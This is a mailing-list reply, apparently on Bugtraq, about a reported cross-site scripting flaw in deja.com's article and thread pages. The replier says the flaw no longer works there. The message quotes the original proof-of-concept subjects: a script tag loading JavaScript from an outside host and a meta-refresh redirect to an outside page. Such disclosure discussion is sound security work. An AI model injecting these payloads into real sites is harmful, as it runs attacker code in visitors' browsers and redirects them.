You, Niall Smart, <[EMAIL PROTECTED]>, wrote:
> deja.com does not always escape meta-characters when displaying
^^^^^^^^^^
> Usenet articles. Specifically, the article view page
> (http://www.deja.com/getdoc.xp) and the thread view page
> (http://www.deja.com/viewthread.xp) display the subject of the
> article "as is" between title tags.
>
> Examples
> ========
>
> JavaScript popup:
>
> http://www.deja.com/getdoc.xp?AN=591804116
Comes out as (copy/paste from netscape):
------------
>> Forum: alt.test
>> Thread: </title><script
>> src="http://www.in-design.com/~nsmart/foo.js"></script><body
>> onLoad="return bar()">
>> Message 1 of 1
Subject: </title><script src="http://www.in-design.com/~nsmart/foo.js">
</script><body onLoad="return bar()">
Date: 03/01/2000
Author: regkey <[EMAIL PROTECTED]>
--------------
I have javascript enabled, no popup.
> Redirection using meta tag:
>
> http://www.deja.com/getdoc.xp?AN=591833344
Comes out as:
-----------------
>> Forum: alt.test
>> Thread: </title><meta http-equiv="refresh"
content="0;url=http://www.in-design.com/~nsmart/deja.html">
>> Message 1 of 1
Subject: </title><meta http-equiv="refresh"
content="0;url=http://www.in-design.com/~nsmart/deja.html">
Date: 03/01/2000
Author: regkey <[EMAIL PROTECTED]>
--------------------
No redirection here to www.in-design.com.
Looking at the source, in both cases (javascript and meta rerefresh) the
"<" and ">" are properly replaced by "<" and ">" eliminating the
vulnerabilities you mentioned. Same thing applies then I get the article
via powersearch.
So either someone at Deja reads Bugtraq and did a fix before this reply or
this is a case where things _are_ properly escaped.
Cheers,
\Geert.
--
Geert Altena | [EMAIL PROTECTED] | Coffee, black, no sugar
Finger for PGPkey : Diffie-Hellman 2048/0xC540C550
Prediction is difficult, especially of the future. - (Niels Bohr)
